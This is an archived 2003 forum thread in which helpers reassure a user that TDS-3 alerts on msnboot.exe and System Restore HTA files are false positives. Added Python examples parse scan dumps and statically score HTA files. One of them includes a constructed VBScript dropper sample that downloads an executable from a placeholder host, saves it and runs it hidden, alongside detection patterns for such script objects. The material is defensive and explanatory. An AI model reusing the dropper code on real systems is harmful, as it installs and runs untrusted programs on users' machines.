suspicious and positive files found

Discussion in 'Trojan Defence Suite' started by mAw, May 8, 2003.

Thread Status:
Not open for further replies.
  1. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    FDS has found two suspicious files on my pc.
    One in my C drive and the other in G.
    I run W98 SE on C and XP Pro on G. I have just installed XP and so have spent little time there. This is what was found:

    Scan Control Dumped @ 15:46:56 07-05-03
    Positive identification <Adv>: Possible WebDownloader
    File: c:\program files\online services\msn50\msnboot.exe

    Suspicious Filename: HTA file in suspicious location
    File: g:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp35\a0014751.hta

    It may sound silly but what should I do with these?
    I am not sure about deleting the G file as I may alter something, and as for the C one it looks like a true MSN file o_O
    As you can tell I am not too pc savvy and need some advice.
    Thank you
     
  2. Patrice (Registered Member; joined Apr 15, 2003; 571 posts; Antarctica)
    Hi mAw!

    If I were you I would send the first file to DCS for further inspection. The second one is in my opinion a false-positive. So don't worry about that. Let's say your system isn't compromised or something like that, TDS-3 just found two suspicious files. The first one could be a Web-Downloader, but it could also be a false-positive. DCS will tell you!

    Best regards,

    Patrice
     
  3. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    Thank you Patrice for helping me out. Will do just that.
    Sock it to me Socrates!!
    mAw
     
  4. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    I am trying to see how to e-mail DCS. In the mean time I have scanned again with TDS-3 and it has come up with another file.
    Scan Control Dumped @ 11:32:21 08-05-03
    Positive identification <Adv>: Possible WebDownloader
    File: c:\program files\online services\msn50\msnboot.exe

    Suspicious Filename: HTA file in suspicious location
    File: d:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp4\a0002480.hta

    Suspicious Filename: HTA file in suspicious location
    File: g:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp35\a0014751.hta

    I think that it is probably not as innocent as we thought. Can someone please tell me exactly how to copy these files and e-mail them to you?
    I tried to submit the files to TDS but as I am using a trial version I could not.
    Thanks for any help.
     
  5. Patrice (Registered Member; joined Apr 15, 2003; 571 posts; Antarctica)
    Hi again,

    Don't worry, those files are false-positives. They are based in the restore section of Windows. If I do a full scan of my system I get up to 60 alarms... Well, most of them are files like this one here:

    Etherreal v0.9.8.exe

    I like to save the files in that way. But for TDS-3 this is a double extension.

    Zip the suspicious file, attach it to an email and send it to this guy:

    'gavin@diamondcs.com.au'

    He's very good at analyzing suspicious files! ;) Actually I think you don't have a trojan, the file seems to be part of MSN.

    Regards,

    Patrice

    P.S. By the way, never ever panic! ;)
     
  6. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    Thank you Patrice. I am feeling more at ease with all this since your help. I have mailed files to Gavin.
    mAw
     
  7. Jooske (Registered Member; joined Feb 12, 2002; 9,713 posts; Netherlands, EU near the sea)
    Hi mAw,
    welcome here.
    The msnboot is not wrong: that is a file which comes with the IE installation to help you connect to the internet via MSN.
    The HTA files have my interest, as they are located in the restore part. So they might be remnants of former infections; do you remember if your system has been infected?
    They are in the restore part, the XP side, so if you scan and clean the system, disable System Restore and reboot, the older restore points, including those infections, are gone, especially if you then make a new restore point manually from the clean situation.

    Make sure you update the radius to the latest via the website http://tds.diamondcs.com.au/radius.td3
    Copy that file into the TDS directory, start or reload TDS, and configure your TDS to scan with all available options on and at the highest sensitivity.
    If you then still find alerts, right-click on a file and save the whole alert report to the scandump.txt, which you might like to post here for review.
    If there are suspicious files --not the msnboot, as that is ok-- you can zip them and send them to submit@diamondcs.com.au if it says "suspicious"; normal positive identifications are identified already and don't need review, they only need to be got rid of.

    To avoid new hta infections you might like to install WormGuard and, for control and blocking of possible outbound connections, Port Explorer too.

    Let us know how it goes please!
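Added example, not part of the thread and not TDS-3's own code: a small Python parser for scan-dump text in the layout mAw posted, which picks out each alert's kind, detail and path, recognises paths that lie in an XP System Restore folder (_restore{GUID}\RPnn\A00nnnnn.ext, the snapshot area Jooske refers to) and applies the triage rule from this post. The sample dump is constructed from the paths already quoted above; the regexes, class names and verdict strings are this example's own.

```python
"""Parse a TDS-3 style scan dump and triage each alert (added example)."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# Constructed sample in the layout of the dumps posted in this thread.
# TDS-3 writes the time as hh:mm:ss dd-mm-yy.
SAMPLE_DUMP = r"""
Scan Control Dumped @ 11:32:21 08-05-03
Positive identification <Adv>: Possible WebDownloader
File: c:\program files\online services\msn50\msnboot.exe

Suspicious Filename: HTA file in suspicious location
File: d:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp4\a0002480.hta

Suspicious Filename: HTA file in suspicious location
File: g:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp35\a0014751.hta
"""

HEADER_RE = re.compile(r"^Scan Control Dumped @ (\d{2}:\d{2}:\d{2}) (\d{2}-\d{2}-\d{2})$")
ALERT_RE = re.compile(r"^(Positive identification|Suspicious Filename)(?: <(\w+)>)?: (.+)$")
FILE_RE = re.compile(r"^File: (.+)$")
# Windows XP System Restore stores copies of changed files under
# <drive>:\System Volume Information\_restore{GUID}\RPnn\A00nnnnn.<ext>;
# these are snapshots, not files the system runs from.
RESTORE_RE = re.compile(
    r"\\system volume information\\_restore\{([0-9a-f-]{36})\}\\rp(\d+)\\(a\d+\.\w+)$",
    re.IGNORECASE,
)


@dataclass
class Alert:
    scanned_at: Optional[datetime]
    kind: str               # "Positive identification" or "Suspicious Filename"
    engine: Optional[str]   # the <Adv> tag when present
    detail: str
    path: str

    @property
    def restore_point(self) -> Optional[int]:
        """RP number if the path is a System Restore snapshot, else None."""
        m = RESTORE_RE.search(self.path)
        return int(m.group(2)) if m else None

    def triage(self) -> str:
        # Verdict strings are this example's own, not TDS-3 output.
        if self.kind == "Positive identification":
            return "signature hit: update the database, rescan, remove if it persists"
        if self.restore_point is not None:
            return (f"restore-point snapshot (RP{self.restore_point}): not live; "
                    "clean the system, then disable System Restore to purge it")
        return "unknown file: zip it and submit for analysis"


def parse_dump(text: str) -> List[Alert]:
    alerts: List[Alert] = []
    scanned_at: Optional[datetime] = None
    pending = None  # (kind, engine, detail) waiting for its File: line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := HEADER_RE.match(line):
            scanned_at = datetime.strptime(f"{m.group(2)} {m.group(1)}", "%d-%m-%y %H:%M:%S")
        elif m := ALERT_RE.match(line):
            pending = (m.group(1), m.group(2), m.group(3))
        elif (m := FILE_RE.match(line)) and pending:
            alerts.append(Alert(scanned_at, *pending, m.group(1)))
            pending = None
    return alerts


if __name__ == "__main__":
    for a in parse_dump(SAMPLE_DUMP):
        print(f"{a.kind:24} {a.path}\n    -> {a.triage()}")
```

Paste the contents of scandump.txt into SAMPLE_DUMP (or read the file) to run it over a real dump. Note that the thread itself shows why the "Positive identification" branch says to update first: the msnboot.exe hit turned out to be an over-broad generic signature in the old database.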
     
  8. Andreas1 (Security Expert; joined Jan 29, 2003; 367 posts; Mainz (Ger))
    IIRC, hta files are (or at least have been when they came up and were classed as potentially dangerous) html files with some executable (macro) content.
    If you want, there is no risk in opening such a file in notepad, have a look at it and see if something looks suspicious to you. Maybe it will, maybe it won't. Just make sure that you're not *executing* the file, open your notepad (or replacement) first then go via File...Open...
    These macro thingies are stopped by Wormguard, whether they're in word/office documents, shell scripts, hta or html files or wherever, that's why Jooske pointed you to that one. Also, Wormguard inspects the macro a bit more closely and has a finer heuristic detection of what is suspicious and what is harmless behaviour by a macro.
    All the best,
    Andreas
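Added example, not the thread's code and not how TDS-3 or WormGuard work internally: doing what Andreas suggests in code, reading an .hta as plain text rather than running it, and scanning that text for the kinds of script an HTA can carry that act on the machine (COM objects that start programs, write files or fetch URLs, a hidden window, decoder calls that hint at obfuscation). Both HTA samples are constructed for the example, and the rule list and weights are this example's own heuristics.

```python
"""Static triage of an .hta file: read it as text, never execute it (added example)."""
import re
from typing import Dict, List

# Constructed sample (not a file from the thread): a dropper-style HTA that
# downloads a program and runs it. It is only ever read here as text.
SAMPLE_HTA = r"""<html><head>
<hta:application id="x" windowstate="minimize" showintaskbar="no">
<script language="VBScript">
Set sh = CreateObject("WScript.Shell")
Set xh = CreateObject("Microsoft.XMLHTTP")
xh.Open "GET", "http://example.invalid/update.exe", False
xh.Send
Set st = CreateObject("ADODB.Stream")
st.Type = 1: st.Open: st.Write xh.responseBody
st.SaveToFile "C:\update.exe", 2
sh.Run "C:\update.exe", 0, False
self.close
</script></head><body></body></html>"""

# Constructed harmless HTA: markup only, no script.
BENIGN_HTA = """<html><head><title>Readme</title>
<hta:application id="r"></hta:application></head>
<body><h1>Release notes</h1><p>Nothing here runs.</p></body></html>"""

# (regex, finding, weight). These heuristics and weights are this example's
# own; they are not the rules TDS-3 or WormGuard apply.
RULES = [
    (r"<script\b", "script block present", 1),
    (r"\b(?:CreateObject|ActiveXObject)\s*\(", "COM object instantiation", 2),
    (r"WScript\.Shell|Shell\.Application", "shell object (can start programs)", 3),
    (r"Scripting\.FileSystemObject|ADODB\.Stream", "file write capability", 3),
    (r"Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", "HTTP download capability", 3),
    (r"\.(?:Run|Exec|ShellExecute)\b", "process execution call", 3),
    (r'windowstate\s*=\s*"?minimize|showintaskbar\s*=\s*"?no', "hides its window", 2),
    (r"\b(?:eval|Execute|ExecuteGlobal|unescape|String\.fromCharCode)\s*\(", "dynamic code or decoding (obfuscation)", 2),
]


def triage_hta(text: str) -> Dict[str, object]:
    """Score the HTA source; returns score, findings and a verdict string."""
    findings: List[str] = []
    score = 0
    for pattern, label, weight in RULES:
        hits = re.findall(pattern, text, re.IGNORECASE)
        if hits:
            findings.append(f"{label} (x{len(hits)})")
            score += weight
    if score >= 9:
        verdict = "likely downloader/dropper: do not run, zip and submit for analysis"
    elif score >= 3:
        verdict = "has active content: read the script by hand before deciding"
    else:
        verdict = "no executable content found"
    return {"score": score, "findings": findings, "verdict": verdict}


def triage_hta_file(path: str) -> Dict[str, object]:
    # open() reads the bytes as text; nothing here hands the file to mshta.exe.
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        return triage_hta(fh.read())


if __name__ == "__main__":
    for name, src in (("dropper", SAMPLE_HTA), ("readme", BENIGN_HTA)):
        r = triage_hta(src)
        print(f"{name}: score {r['score']} -> {r['verdict']}")
        for f in r["findings"]:
            print("   ", f)
```

Copy the .hta out of the restore folder first (or point triage_hta_file at it directly); the script only reads the file, so double-clicking is the one thing to avoid, exactly as the post says. A clean score means only that none of these patterns appear, not that the file is safe, so heavily encoded script still deserves a manual read.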
     
  9. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    Hi Jooske: I haven't had a virus since 2002. That one was w32 BadtransB@mm. My savvy pc friend erased my whole drive and boot sector and started fresh again with the W98. I have had the normal hang ups and nothing out of the ordinary.
    About two weeks ago I tried to defrag C and it would not. I got Webroot Spybot Search and Destroy v1.2 and swept the drive. Printed out 10 suspicious entries. I wish I could find the file to post here but cannot. Some places were like:
    DOS exploit Data source object exploit (Registry change, nothing done)
    HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004=W=3 .
    Another would be
    NewsUpdate: Typelib (Registry key, nothing done)
    HKEY_CLASS_ROOT\Typelib\{8614A941-FF72-11D0-9BA1-00AA00464A16}.
    I put them in quarantine.
    Tried a trial version of Vopt 99 and it managed to defrag C. I realized my days were limited on the trial version so tried to defrag G drive (XP) and it said there were Structural errors on this disk. Use ScanDisk to check for errors. The reason was Err=Bad File Size.
    ScanDisk found 11 problems which I said ignore and continue.
    Have since scanned with SD and it only found one in boot sector (... o_O I think) so I got it to repair that one.
    These could have nothing to do whatsoever with what TDS found but thought you might find a relation there.
    I will get back on track here. I did update the radius and saw that it went in Temp. Now that I am to copy them I can't see which temp they went into. I probably wouldn't recognize them anyway. Is there a way I can search for files and folders and see them?
    PS thank you Andreas and will work my way through to your help too.
     
  10. Gavin - DiamondCS (Former DCS Moderator; joined Feb 10, 2002; 2,080 posts; Perth, Western Australia)
    Yep, no problems with these files. The old databases would detect MSNBOOT.EXE as we had just added some generic webdownloader detection.

    If this is all TDS finds after you update the databases, you are in good shape ! Update and run a full scan as per my email :)
     
  11. Jooske (Registered Member; joined Feb 12, 2002; 9,713 posts; Netherlands, EU near the sea)
    Hi again mAw,
    the radius is called radius.td3 and the few times I get it manually I drop it immediately in the TDS directory. Your download might protest about a file already existing etc.; you might like to d/l it to your desktop to see it and move it into the TDS directory. With a registered version this is so much easier: it backs up the existing radius and places the new one beside it, and that backup overwrites the former .bak so you won't fill the HD with unnecessary older versions :) After that it reloads the radius engine itself, so no need to restart your whole TDS with all that initial scanning again; all in one daily press of the button in the menu, or if configured it is even all done automatically twice a week.

    You might like to use one folder on your system named "My downloads" and point all your d/l there, maybe you even like to create different folders there for different kinds of downloads to find them back easier. Although if you go to such a folder and sort on date/time it should show on top.


    For the scandisk/defrag you might like to reboot in safe mode and do it all from there.
    It's much easier for windows, less programs active and not hindered by firewalls and av/at programs (which you should close anyway for such actions).
    In the taskmanager you might like to close everything except the necessary systray and explorer if that helps even more.
    I always do, and once in a while I put the scandisk on all advanced options and all available tests. Hope the safe mode helps you defragging!
    Not sure which is a nice defragger; we might like that kind of info in the other forums for "other software and services".
     
  12. mAw (Registered Member; joined May 8, 2003; 7 posts; Canada)
    Hi Jooske. I did another download of the Radius and this time put it in the TDS file as Gavin suggested in his e-mail. I can't find any other file for radius fd3 on my system other than the one I put in FDS file. I must have 'run' the download and not saved it, therefore the TEMP notice. I'm sure that the registered version would be easier for me but I am not able to do that at this time.
    I appreciate your help with defragging. I did deactivate my systray but still had a prob. Will try safe mode next time and your hint to go to "other software and services".
    Certainly wish I had the knowledge to use all that is available on the TDS app. It looks like a good program. But, better to know that if I run into difficulty you people are there to help me. Thank you. :-*
     
  13. Jooske (Registered Member; joined Feb 12, 2002; 9,713 posts; Netherlands, EU near the sea)
    We all have to learn and before we know it all there is another tool to enjoy or betatest for its technology might be integrated into TDS/WG-4.

    I said "NOT" to close the systray, that one needs to be there. In safe mode you have nothing unnecessary I suppose so no need to close more, in normal mode you'll have to close everything also from the task manager and hidden things and firewalls and scanners and all the lot, and you might like to close everything in the taskmanager EXCEPT explorer and systray.

    radius.td3 is the name, not fd3. Should be located in the TDS-3 directory. FDS file o_O? don't know that one.

    Ah you know, we buy our $1000 or 2000 or even more systems and add and keep adding hardware and whatever needed, but what is then a few tens of dollars to protect all that to the ultimate? A few less movies or burger king and it's there. We lock our $200,000 home with a doorlock of maybe $200, we just know we need some caretaking of our systems too.
    What's $50 for life long pleasure fun security and a happy family around? The best top notch Security in the first place, the other features we learn rather quick to be there too.
     
  14. Patrice (Registered Member; joined Apr 15, 2003; 571 posts; Antarctica)
    Hi mAw,

    It's me, I'm back again.
    Actually this doesn't look nice. It might be that your harddisk begins to produce bad sectors. If this really is the case, your harddisk won't make it that long. I suggest that you check your harddisk thoroughly. Use SpinRite for that:

    http://grc.com/freepopular.htm

    More information about this tool and how you should use it, you'll find here:

    http://grc.com/default.htm

    Don't forget, this is just a guess. Perhaps your harddisk is fine. But it's worth testing it. Never ever trust or rely on a harddisk... Be aware that with SpinRite you can't check NTFS partitions (if you have that installed on your XP side).

    Best regards,

    Patrice
     
  15. Andreas1 (Security Expert; joined Jan 29, 2003; 367 posts; Mainz (Ger))
    also,
    backup important data before trying to repair anything. I have recently lost a text worth several weeks of work because after some crash I had scandisk and Norton's Disk Doctor do the rest of the complete and ultimate destruction. :'(
    CU,
    Andreas
     